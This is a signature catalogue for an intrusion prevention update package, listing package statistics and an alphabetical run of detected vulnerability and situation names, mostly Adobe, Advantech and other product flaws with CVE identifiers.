Detected Vulnerabilities and Situations in sgpkg-ips-1873-5242

This update package contains
Fingerprint signatures 14620
Vulnerabilities 10344
CVE/CAN entries 8449
Applications 7406
Non-vulnerability related situations 18754
Other situations detected by Inspection Engines 9879

Table of Contents

Vulnerabilities by name

Situations by name

Vulnerabilities by name

.NET-Framework-Stack-Overflow-Denial-of-Service-CVE-2016-0033
100Bao-Peer-To-Peer-Network
180-Search-Assistant
2020search
2nd-Thought
2Wire-Cross-Site-Request-Forgery
3Com-OfficeConnect-ADSL-Wireless-11g-Router-Authentication-Bypass
3CX-Phone-System-CRM-Integration-SQL-Injection-CVE-2023-49954
3CX-Phone-System-VAD_Deploy.aspx-Arbitrary-File-Upload
3ivx-MPEG-4-MP4-File-Handling-Stack-Overflow
3s-Smart-Software-Solutions-Codesys-Gateway-Server-Arbitrary-File-Creation
3s-Smart-Software-Solutions-Codesys-Gateway-Server-Denial-Of-Service
3s-Smart-Software-Solutions-Codesys-Gateway-Server-Memory-Access-Error
3s-Smart-Software-Solutions-Codesys-Gateway-Server-Stack-Buffer-Overflow
427BB-Authentication-Bypass
4Shared-File-Sharing-Service
7-Zip-7z-File-Ppmd-Properties-Parsing-Integer-Underflow-Vulnerability
7-Zip-Rar-Solid-Compression-Remote-Code-Execution
7-Zip-Squashfs-File-Uidtable-Parsing-Buffer-Overflow-Vulnerability
7-Zip-Zstandard-Decompression-Integer-Underflow-CVE-2024-11477
7t-Interactive-Graphical-SCADA-Arbitrary-File-Execution
7t-Interactive-Graphical-SCADA-Arbitrary-File-Read-And-Overwrite
7t-Interactive-Graphical-SCADA-DoS
7t-Interactive-Graphical-SCADA-File-Operations-Buffer-Overflows
A-PDF-WAV-To-MP3-Buffer-Overflow
Ababil-Trojan
ABB-Microscada-Wserver-Command-Execution
ABB-Microscada-Wserver-Multiple-Buffer-Overflows
ABB-Multiple-Products-Robnetscanhost.exe-Stack-Buffer-Overflow
ABB-Panel-Builder-800-Comli-Commandlineoptions-Stack-Based-Buffer-Overflow
ABB-Pb610-Panel-Builder-600-Idal-HTTP-Host-Stack-Buffer-Overflow
ABB-Test-Signal-Viewer-Cwgraph3d-ActiveX-Arbitrary-File-Creation
ABetterInternet
ABUS-TVIP-20000-21150-Security-Camera-Command-Injection-CVE-2023-26609
ABUS-TVIP-20000-21150-Security-Camera-Local-File-Inclusion
Abyss-Web-Server-HTTP-Get-BOF
Accellion-FTA-oauth_token-Remote-Command-Execution
Accellion-FTA-statecode-Cookie-Remote-File-Disclosure
ACDSee-Products-XPM-Values-Section-Buffer-Overflow
ACDSee-XBM-Header-Name-Buffer-Overflow
ACDSee-XPM-File-Handling-Buffer-Overflow
ACGVclick-Php-Remote-File-Include-Vulnerability
Acquia-Mautic-Tracking-Pixel-Stored-Cross-Site-Scripting
Acrobat-Reader-eBook-Plug-In-Format-String
Acronis-Cyber-Infrastructure-Default-Password-RCE
Acronis-Cyber-Protect-Backup-Remote-Code-Execution
ACTi-ASOC-2200-Web-Configurator-Remote-Root-Command-Execution
Actionscript-Security-Bypass-Vulnerability-CVE-2016-4139
Active-Collab-Remote-PHP-Code-Injection
ActiveX-Object-Obfuscated-Content
Actualscripts-Actualanalyzer-Cookie-Command-Execution
ActXax-Raw-Server-Buffer-Overflow
Acunetix-Vulnerability-Scanner-Usage
Adbopebot-Trojan
Adload-Command-And-Control-Traffic
Adminer-Remote-Arbitrary-File-Read-CVE-2021-43008
Adobe-Acrobat--Embedded-JBIG2-Stream-Buffer-Overflow
Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Addfield-Use-After-Free
Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-buttonGetIcon-Use-After-Free
Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Deleteitemat-Use-After-Free
Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Field-Format-Action-Use-After-Free
Adobe-Acrobat-And-Acrobat-Reader-Heap-Buffer-Overflow
Adobe-Acrobat-And-Acrobat-Reader-Information-Disclosure
Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
Adobe-Acrobat-And-Adobe-Reader-Plugin-Object-Reloading-Memory-Corruption
Adobe-Acrobat-And-Adobe-Reader-U3D-Rhadobemeta-Buffer-Overflow
Adobe-Acrobat-And-Reader-Acroform-Encoding-Code-Execution
Adobe-Acrobat-And-Reader-Acroform-Font-Encoding-Code-Execution
Adobe-Acrobat-And-Reader-Acroform-Use-After-Free
Adobe-Acrobat-And-Reader-Addannot-Use-After-Free
Adobe-Acrobat-And-Reader-Dc-Acroform-Buttongetcaption-Use-After-Free
Adobe-Acrobat-And-Reader-Docid-Stack-Buffer-Overflow
Adobe-Acrobat-And-Reader-Escript-Out-Of-Bounds-Read
Adobe-Acrobat-And-Reader-Font-Parsing-Integer-Overflow
Adobe-Acrobat-And-Reader-Form-Field-Format-Use-After-Free
Adobe-Acrobat-And-Reader-JavaScript-Field-Name-Out-Of-Bounds-Read
Adobe-Acrobat-And-Reader-Jpeg2000-Out-Of-Bounds-Read
Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read
Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-15953
Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4949
Adobe-Acrobat-And-Reader-PDF-Gotoe-Information-Disclosure
Adobe-Acrobat-And-Reader-PDF-XML-Stylesheet-Information-Disclosure
Adobe-Acrobat-And-Reader-Remote-Code-Execution
Adobe-Acrobat-And-Reader-U3D-Uninitialized-Variable
Adobe-Acrobat-And-Reader-Xfa-Oneofchild-Remote-Code-Execution
Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow
Adobe-Acrobat-Dc-Smask-Image-Xobject-Height-Out-Of-Bounds-Write
Adobe-Acrobat-EMF-Emfplusdrawlines-Count-Heap-Buffer-Overflow
Adobe-Acrobat-File-Extension-Buffer-Overflow
Adobe-Acrobat-File-Information-Disclosure
Adobe-Acrobat-Flatedecode-Integer-Overflow
Adobe-Acrobat-Imageconversion-EMF-BMP-Heap-Buffer-Overflow
Adobe-Acrobat-Imageconversion-EMF-BMP-Out-Of-Bounds-Read
Adobe-Acrobat-Imageconversion-EMF-Emfplus-Heap-Based-Buffer-Overflow
Adobe-Acrobat-Imageconversion-EMF-Emfplusdrawbeziers-Type-Confusion
Adobe-Acrobat-Imageconversion-EMF-Emfpluspath-Object-Heap-Buffer-Overflow
Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchblt-Out-Of-Bounds-Read
Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchdibits-Heap-Based-Buffer-Overflow
Adobe-Acrobat-Imageconversion-EMF-Heap-Based-Buffer-Overflow
Adobe-Acrobat-Imageconversion-EMF-Integer-Overflow
Adobe-Acrobat-Imageconversion-EMF-Parsing-Integer-Overflow
Adobe-Acrobat-Imageconversion-EMF-Parsing-Out-Of-Bounds-Read
Adobe-Acrobat-Imageconversion-Emfplus-Heap-Based-Buffer-Overflow
Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Information-Disclosure
Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Out-Of-Bounds-Read
Adobe-Acrobat-Imageconversion-JPEG-Heap-Buffer-Overflow
Adobe-Acrobat-Imageconversion-JPEG-Out-Of-Bounds-Read
Adobe-Acrobat-Imageconversion-JPEG-Parsing-Out-Of-Bounds-Read
Adobe-Acrobat-JavaScript-GetAnnots-Memory-Corruption
Adobe-Acrobat-JavaScript-GetIcon-Method-Buffer-Overflow
Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read
Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read-CVE-2019-7109
Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Write
Adobe-Acrobat-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4990
Adobe-Acrobat-JPXDecode-Memory-Corruption
Adobe-Acrobat-Media-Newplayer-Code-Execution
Adobe-Acrobat-Ocg-Setintent-Integer-Overflow
Adobe-Acrobat-PDF-Font-Processing-Memory-Corruption
Adobe-Acrobat-Pro-Dc-Acroform-setFocus-Use-After-Free
Adobe-Acrobat-Pro-Dc-Fdf-Object-Use-After-Free
Adobe-Acrobat-Pro-Dc-JavaScript-Submitform-Url-Out-Of-Bounds-Read
Adobe-Acrobat-Pro-Heap-Buffer-Overflow-CVE-2014-0529
Adobe-Acrobat-Pro-Information-Disclosure-CVE-2015-3058
Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3053
Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3054
Adobe-Acrobat-Reader-Adobepdf-ActiveX-Use-After-Free
Adobe-Acrobat-Reader-Dc-Annots-File-Id-Out-Of-Bounds-Read
Adobe-Acrobat-Reader-Dc-Annots.api-Setprops-Use-After-Free
Adobe-Acrobat-Reader-Dc-Escript.api-Thermometer-Object-Use-After-Free
Adobe-Acrobat-Reader-Dc-Jpeg2000-Heap-Buffer-Overflow
Adobe-Acrobat-Reader-Dc-Path-Join-Out-Of-Bounds-Read
Adobe-Acrobat-Reader-Dc-Window-Procedure-wm_setFocus-Use-After-Free
Adobe-Acrobat-Reader-Esobject-Use-After-Free
Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2946
Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2949
Adobe-Acrobat-Reader-ICC-MLUC-Integer-Overflow
Adobe-Acrobat-Reader-JBIG2-CVE-2013-3352
Adobe-Acrobat-Reader-Jpeg2000-CVE-2016-6941-Information-Disclosure
Adobe-Acrobat-Reader-Jpeg2000-Information-Disclosure
Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6942
Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6970
Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2941
Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2960
Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2964
Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2965
Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6957
Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6958
Adobe-Acrobat-Reader-Shell-Metacharacter-Code-Execution
Adobe-Acrobat-Reader-Stack-Overflow-CVE-2017-2948
Adobe-Acrobat-Reader-Toolbutton-Use-After-Free
Adobe-Acrobat-Reader-Type-Confusion-CVE-2017-2962
Adobe-Acrobat-Reader-U3D-CLODMeshContinuation-Code-Execution
Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption
Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6944
Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6945
Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2955
Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2956
Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2961
Adobe-Acrobat-Reader-Xfa-Formcalc-Replace-Integer-Overflow
Adobe-Acrobat-XPS-Font-Parsing-Out-Of-Bounds-Read
Adobe-Acrobat-XPS-Initial-Page-Processing-Format-String-Vulnerability
Adobe-Acrobat-XPS-JPEG-App2-Parsing-Heap-Based-Buffer-Overflow
Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read
Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read-CVE-2018-4889
Adobe-Acrobat-XPS-Out-Of-Bounds-Read
Adobe-Acrobat-XPS-Path-Element-Out-Of-Bounds-Write
Adobe-Acrobat-XPS-Processing-Format-String
Adobe-Acropdf-ActiveX-Control-Memory-Corruption
Adobe-Audition-Session-File-Stack-Buffer-Overflow
Adobe-Audition-Session-File-TRKM-Stack-Buffer-Overflow
Adobe-authplay.dll-Code-Execution-CVE-2010-1297
Adobe-BlazeDS-XML-External-Entity-Injection
Adobe-Camera-Raw-Plugin-TIFF-Image-Processing-Buffer-Underflow
Adobe-ColdFusion-Application-Server-CVE-2022-38418-Directory-Traversal
Adobe-ColdFusion-Application-Server-CVE-2022-38421-Directory-Traversal
Adobe-ColdFusion-Application-Server-CVE-2023-26361-Directory-Traversal
Adobe-ColdFusion-Authentication-Misconfiguration
Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload
Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload-Second
Adobe-ColdFusion-Ckeditor-Unrestricted-File-Upload
Adobe-ColdFusion-Ckeditor-Upload-Unrestricted-File-Upload
Adobe-ColdFusion-Ckeditor-Upload.cfm-Directory-Traversal
Adobe-ColdFusion-CVE-2019-7839-Remote-Code-Execution
Adobe-ColdFusion-CVE-2022-35690-ODBC-Agent-Memory-Corruption
Adobe-ColdFusion-CVE-2023-38204-Insecure-Deserialization
Adobe-ColdFusion-Dataservicescfproxy-Commons-Beanutils-Insecure-Deserialization
Adobe-ColdFusion-Dataservicescfproxy-Rome-Framework-Insecure-Deserialization
Adobe-ColdFusion-Deserialization-Of-Untrusted-Data-Vulnerability-CVE-2023-26360
Adobe-ColdFusion-Directory-Traversal
Adobe-ColdFusion-FCKeditor-Multiple-Directory-Traversal-And-File-Execution
Adobe-ColdFusion-Getargumentcollection-Insecure-Deserialization
Adobe-ColdFusion-Improper-Access-Control-CVE-2024-20767
Adobe-ColdFusion-Improper-Access-Control-Vulnerability-CVE-2023-29298
Adobe-ColdFusion-Insecure-Deserialization-CVE-2023-29300
Adobe-ColdFusion-InvokeLoggingModule-Directory-Traversal-CVE-2024-53961
Adobe-ColdFusion-Javaadapter-Javabeanadapter-Insecure-Deserialization
Adobe-ColdFusion-Rmi-Registry-Insecure-Deserialization
Adobe-ColdFusion-Scheduleedit.cfm-Authentication-Bypass
Adobe-Commerce-And-Magento-Open-Source-External-Entity-Injection-CVE-2024-34102
Adobe-Commerce-And-Magento-Open-Source-group.php-Cross-Site-Scripting
Adobe-Commerce-And-Magento-Open-Source-Shipping-Policy-Cross-Site-Scripting
Adobe-Commerce-And-Magento-Open-Source-Widget-XML-Injection
Adobe-Digital-Editions-Epub-Xxe-Information-Disclosure
Adobe-DNG-Software-Development-Kit-Decodeimage-Out-Of-Bounds-Read
Adobe-DNG-Software-Development-Kit-Readuncompressed-Heap-Buffer-Overflow
Adobe-Download-Manager-Getplus-ActiveX-Control-Buffer-Overflow
Adobe-Flash-Asnative-Null-Pointer-Dereference
Adobe-Flash-Bitmapdata-copyPixels-UAF
Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0633
Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0634
Adobe-Flash-Corrupted-SWF-File
Adobe-Flash-CVE-2010-3654-Remote-Code-Execution-Vulnerability
Adobe-Flash-Heap-Overflow-Vulnerability-CVE-2016-4135
Adobe-Flash-Heap-Overflow-Vulnerability-CVE-2016-4136
Adobe-Flash-Iexternalizable-Interface-Readexternal-Method-Type-Confusion
Adobe-Flash-Iexternalizable-Interface-Type-Confusion
Adobe-Flash-Json.stringify-Proxy-Object-Heap-Buffer-Overflow
Adobe-Flash-Loadpcmfrombytearray-Use-After-Free
Adobe-Flash-Media-Content
Adobe-Flash-Memory-Corruption-CVE-2012-5267
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4132
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4133
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4137
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4138
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4141
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4150
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4151
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4152
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4153
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4154
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4155
Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4156
Adobe-Flash-Mp3-Id3-Tag-Integer-Overflow
Adobe-Flash-parseFloat-Stack-Buffer-Overflow
Adobe-Flash-PCRE-Memory-Corruption
Adobe-Flash-Player-And-Air-Domain-Global-Memory-Operation-Integer-Underflow
Adobe-Flash-Player-And-Air-Multiple-Vulnerabilities
Adobe-Flash-Player-And-Air-String-Concatenation-Integer-Overflow
Adobe-Flash-Player-Asnative-2100-Netconnection-Type-Confusion
Adobe-Flash-Player-Audio-Buffer-Overflow-CVE-2015-3113
Adobe-Flash-Player-Bitmapdata-Hittest-Out-of-Bounds-Access
Adobe-Flash-Player-ByteArray-Uncompression-Uninitialized-Reference
Adobe-Flash-Player-ByteArray-Use-After-Free-RCS
Adobe-Flash-Player-Convolutionfilter-Matrix-Array-Use-After-Free
Adobe-Flash-Player-Copypixelstobytearray-Integer-Overflow
Adobe-Flash-Player-Copyrawdatato-Out-Of-Bounds-Array-Indexing
Adobe-Flash-Player-CVE-2014-8439-Write-What-Where
Adobe-Flash-Player-CVE-2015-3106-Use-After-Free
Adobe-Flash-Player-CVE-2015-5561-Use-After-Free
Adobe-Flash-Player-CVE-2017-2927
Adobe-Flash-Player-CVE-2017-2934
Adobe-Flash-Player-CVE-2018-15982-Use-After-Free
Adobe-Flash-Player-CVE-2018-4878-Use-After-Free
Adobe-Flash-Player-DeleteRangeTimelineOperation-Type-Confusion
Adobe-Flash-Player-Domainmemory-Clear-Use-After-Free
Adobe-Flash-Player-Domainmemory-Use-After-Free
Adobe-Flash-Player-Domainmemory-Write-Use-After-Free
Adobe-Flash-Player-Filereference-Type-Confusion
Adobe-Flash-Player-Flawed-Bytecode-Verification-CVE-2017-11292
Adobe-Flash-Player-FLV-Processing-Buffer-Overflow
Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution
Adobe-Flash-Player-Function-Variables-Information-Disclosure
Adobe-Flash-Player-Index-Overflow-Vulnerability
Adobe-Flash-Player-Information-Disclosure
Adobe-Flash-Player-Invalid-Object-Reference-Code-Execution
Adobe-Flash-Player-JPG-Embedded-SWF-Processing-Heap-Overflow
Adobe-Flash-Player-Load-And-Store-Write-What-Where
Adobe-Flash-Player-Loadpcmfrombytearray-Integer-Overflow
Adobe-Flash-Player-Localeid-Determinepreferredlocales-Out-of-Bounds-Access
Adobe-Flash-Player-MP4-File-Memory-Corruption
Adobe-Flash-Player-MP4-File-Memory-Corruption-CVE-2015-0360
Adobe-Flash-Player-MP4-Sequence-Parameter-Set-Parsing-BOF
Adobe-Flash-Player-Nellymoser-Datasize-Heap-Buffer-Overflow
Adobe-Flash-Player-OP_inclocal-And-OP_declocal-Memory-Corruption
Adobe-Flash-Player-Rectangle-Use-After-Free
Adobe-Flash-Player-RTMP-Error-Message-Object-Type-Confusion
Adobe-Flash-Player-Security-Bypass-CVE-2015-3099
Adobe-Flash-Player-Security-Bypass-CVE-2015-3102
Adobe-Flash-Player-Security-Context-Bypass-CVE-2015-3044
Adobe-Flash-Player-Shader-Memory-Corruption
Adobe-Flash-Player-Shader-Parameter-Write-What-Where
Adobe-Flash-Player-ShaderJob-Memory-Corruption
Adobe-Flash-Player-Sharedobject-Use-After-Free
Adobe-Flash-Player-Stack-Overflow-CVE-2012-2035
Adobe-Flash-Player-SWF-File-Code-Execution
Adobe-Flash-Player-TextLine-opaqueBackground-Use-After-Free
Adobe-Flash-Player-Type-Confusion-Memory-Corruption
Adobe-Flash-Player-Use-After-Free-CVE-2015-5122
Adobe-Flash-Player-Use-After-Free-CVE-2015-8413
Adobe-Flash-Player-Use-After-Free-CVE-2015-8430
Adobe-Flash-Player-Use-After-Free-CVE-2016-0988
Adobe-Flash-Player-Use-After-Free-CVE-2016-7892
Adobe-Flash-Player-Use-After-Free-CVE-2017-3058
Adobe-Flash-Player-Use-After-Free-CVE-2017-3059
Adobe-Flash-Player-Use-After-Free-CVE-2017-3062
Adobe-Flash-Player-Use-After-Free-CVE-2017-3063
Adobe-Flash-Player-Vulnerability-CVE-2012-1535
Adobe-Flash-Selection.setfocus-Use-After-Free
Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4144
Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4149
Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4121
Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4142
Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4143
Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4146
Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4147
Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4148
Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-7855
Adobe-Flash-Vulnerability-CVE-2011-0609
Adobe-Flash-Vulnerability-CVE-2011-0611
Adobe-Flash-Vulnerability-CVE-2016-4171
Adobe-Illustrator-Eps-File-Dsc-Comment-Buffer-Overflow
Adobe-Indesign-Server-Soap-Request-Lack-Of-Authentication
Adobe-Indesign-Unsafe-Hyperlink-Processing-Remote-Code-Execution
Adobe-Magento-Downloadcss-Cross-Site-Scripting
Adobe-Magento-Remote-Code-Execution-CVE-2022-24086
Adobe-Multiple-Products-BMP-Image-Header-Handling-Buffer-Overflow
Adobe-Photoshop-Asset-Elements-Stack-Buffer-Overflow
Adobe-Photoshop-Cs4-Abr-File-Processing-Buffer-Overflow
Adobe-Photoshop-Cs5-Gif-File-Heap-Corruption
Adobe-Photoshop-PNG-Image-Processing-Buffer-Overflow
Adobe-Photoshop-TIFF-Parsing-Heap-Buffer-Overflow
Adobe-Products-PNG-File-Handling-Stack-Buffer-Overflow
Adobe-Reader-ActiveX-Vulnerable-Function-Call
Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-Stack-Buffer-Overflow
Adobe-Reader-And-Acrobat-Printf-Stack-Buffer-Overflow
Adobe-Reader-And-Acrobat-Rle-Encoded-BMP-File-Integer-Overflow
Adobe-Reader-And-Acrobat-Rma-Objects-Memory-Corruption
Adobe-Reader-And-Acrobat-Sandbox-Policy-Bypass
Adobe-Reader-BMP-Vulnerability-2011-2438a
Adobe-Reader-BMP-Vulnerability-2011-2438c
Adobe-Reader-BMP-Vulnerability-2011-4372
Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2012-2049
Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3353
Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3354
Adobe-Reader-Crash-CVE-2015-3056
Adobe-Reader-Heap-Overflow-CVE-2017-3055
Adobe-Reader-Heap-Overflow-Vulnerability
Adobe-Reader-Heap-Overflow-Vulnerability-CVE-2013-0604
Adobe-Reader-Heap-Overflow-Vulnerability-CVE-2013-0621
Adobe-Reader-Iff-Rgba-Chunk-Buffer-Overflow
Adobe-Reader-Information-Disclosure-CVE-2017-3031
Adobe-Reader-Integer-Overflow-CVE-2010-2862
Adobe-Reader-JavaScript-Heap-Corruption-CVE-2011-4371
Adobe-Reader-JavaScript-Memory-Corruption-CVE-2011-4373
Adobe-Reader-JavaScript-Spell.customDictionaryOpen-Method-Memory-Corruption
Adobe-Reader-JavaScript-Vulnerability-2011-2442
Adobe-Reader-JPEG-Multiple-App0-Markers
Adobe-Reader-Memory-Corruption-CVE-2017-3019
Adobe-Reader-Memory-Corruption-CVE-2017-3025
Adobe-Reader-Memory-Corruption-CVE-2017-3030
Adobe-Reader-Memory-Corruption-CVE-2017-3036
Adobe-Reader-Memory-Corruption-CVE-2017-3050
Adobe-Reader-Memory-Corruption-CVE-2017-3056
Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4147
Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4148
Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4150
Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4151
Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4152
Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4153
Adobe-Reader-OpenTextFile-Buffer-Overflow
Adobe-Reader-Pcx-Height-Integer-Overflow
Adobe-Reader-Pict-Header-Packet-Overflow
Adobe-Reader-Player-CVE-2017-2966
Adobe-Reader-Printseps-Memory-Corruption
Adobe-Reader-Security-Bypass-CVE-2013-0624
Adobe-Reader-Security-Bypass-Vulnerability-CVE-2013-0622
Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-2049
Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4149
Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4155
Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4157
Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4159
Adobe-Reader-U3D-CLODMeshDeclaration-Shading-Count-Buffer-Overflow
Adobe-Reader-Use-After-Free-CVE-2015-3057
Adobe-Reader-Use-After-Free-CVE-2015-3059
Adobe-Reader-Use-After-Free-CVE-2017-3014
Adobe-Reader-Use-After-Free-CVE-2017-3057
Adobe-RoboHelp-Server-Arbitrary-File-Upload
Adobe-RoboHelp-Server-Filename-Directory-Traversal
Adobe-Shockwave-Director-File-Key-Chunk-Parsing-Buffer-Overflow
Adobe-Shockwave-Director-PAMM-Chunk-Memory-Corruption
Adobe-Shockwave-Director-tSAC-Chunk-Parsing-Memory-Corruption
Adobe-Shockwave-Director-tSAC-Chunk-String-Termination-Memory-Corruption
Adobe-Shockwave-Player-DIR-Files-PAMI-Chunk-Code-Execution
Adobe-Shockwave-Player-Lnam-Chunk-Processing-Buffer-Overflow
Adobe-Shockwave-Player-PAMI-Chunk-Parsing-Memory-Corruption
Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Out-Of-Bounds-Array-Indexing
Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Uninitialized-Object-Access
Adobe-Shockwave-Player-rcsL-Corruption
Adobe-ShockwavePlayer-DirectorFile-RecordParsing-Integer-Overflow
Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution
ADODB.Stream-ActiveX-Object-Local-Disk-Write
Adroit-SCADA-Intelligence-Server-DoS
Adsincontext
Advantech-Adamview-Conditional-Bitmap-Remote-Code-Execution
Advantech-Adamview-Display-Properties-Parameter-Remote-Code-Execution
Advantech-Domain-Focused-Configuration-Tool-DoS
Advantech-Iview-Commandservlet-Directory-Traversal
Advantech-Iview-Configurationservlet-Column_Value-SQL-Injection
Advantech-Iview-CVE-2022-2138-Denial-Of-Service
Advantech-Iview-Deleteztpconfig-SQL-Injection
Advantech-Iview-Devicetreetable-exportInventoryTable-Directory-Traversal
Advantech-Iview-Devicetreetable-Exporttaskmgrreport-Directory-Traversal
Advantech-Iview-exportInventoryTable-Sort-SQL-Injection
Advantech-Iview-Findcfgdevicelist-Segment-SQL-Injection
Advantech-Iview-findCfgDeviceListDetailsExport-Filename-Directory-Traversal
Advantech-Iview-findTaskMgrItems-Sort-SQL-Injection
Advantech-Iview-Getallactivetraps-Search_Date-SQL-Injection
Advantech-Iview-getInventoryReportData-Sort-SQL-Injection-2
Advantech-Iview-getInventoryReportData-SQL-Injection
Advantech-Iview-Getpsinventoryinfo-SQL-Injection
Advantech-Iview-NetworkServlet-BackupDatabase-Backup_Filename-Command-Injection
Advantech-Iview-Pstable-Exportpsinventorytable-Directory-Traversal
Advantech-Iview-Runproviewupgrade-Handling-Remote-Command-Injection
Advantech-Iview-Setdeviceauthentication-SQL-Injection
Advantech-Iview-Set_Useraccount-Username-SQL-Injection
Advantech-Iview-Updatepromfile-Ipaddress-SQL-Injection
Advantech-Iview-Updatesegmentinfo-Id-SQL-Injection
Advantech-Iview-UserServlet-SQL-Injection
Advantech-Iview-Ztpconfigtable-SQL-Injection
Advantech-r-Seenet-Device_Graph_Page-Cross-Site-Scripting
Advantech-r-Seenet-Device_List-SQL-Injection
Advantech-r-Seenet-Device_Position-Device_Id-SQL-Injection
Advantech-R-Seenet-Device_status.php-Local-File-Inclusion
Advantech-r-Seenet-Out.PHP-Directory-Traversal
Advantech-r-Seenet-Ping.PHP-Command-Injection
Advantech-r-Seenet-SSH_Form-Cross-Site-Scripting
Advantech-r-Seenet-Telnet_Form-Cross-Site-Scripting
Advantech-Studio-ISSymbol-ActiveX-Control-Multiple-Buffer-Overflows
Advantech-WebAccess-ActiveX-Convtosafearray-Stack-Buffer-Overflow
Advantech-WebAccess-Aspvcobj-ActiveX-Fileprocess-Stack-Buffer-Overflow
Advantech-WebAccess-Aspvcobj-ActiveX-Getlasttagnbr-Stack-Buffer-Overflow
Advantech-WebAccess-Aspvcobj-ActiveX-Getwidestrcpy-Stack-Buffer-Overflow
Advantech-WebAccess-Aspvcobj-ActiveX-Interfacefilter-Stack-Buffer-Overflow
Advantech-WebAccess-Aspvcobj.aspdatadriven-ActiveX-Stack-Buffer-Overflow
Advantech-WebAccess-Blind-SQL-Injection
Advantech-WebAccess-Bwpfile-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Bwrpswd.exe-Stack-Based-Buffer-Overflow
Advantech-WebAccess-Dashboard-Openwidget-Directory-Traversal
Advantech-WebAccess-Dashboard-Removefile-Directory-Traversal
Advantech-WebAccess-Dashboard-removeFolder-Directory-Traversal
Advantech-WebAccess-Dashboard-Uploadimagecommon-Arbitrary-File-Upload
Advantech-WebAccess-Datacore-Service-Function-0x5228-Strcpy-Heap-Buffer-Overflow
Advantech-WebAccess-Datacore-Service-Function-0x523a-Strcpy-Buffer-Overflow
Advantech-WebAccess-Directory-Traversal
Advantech-WebAccess-HMI-And-SCADA-Software-Cross-Site-Scripting
Advantech-WebAccess-HMI-Designer-Pm3-Nanimatedgraphic-Heap-Buffer-Overflow
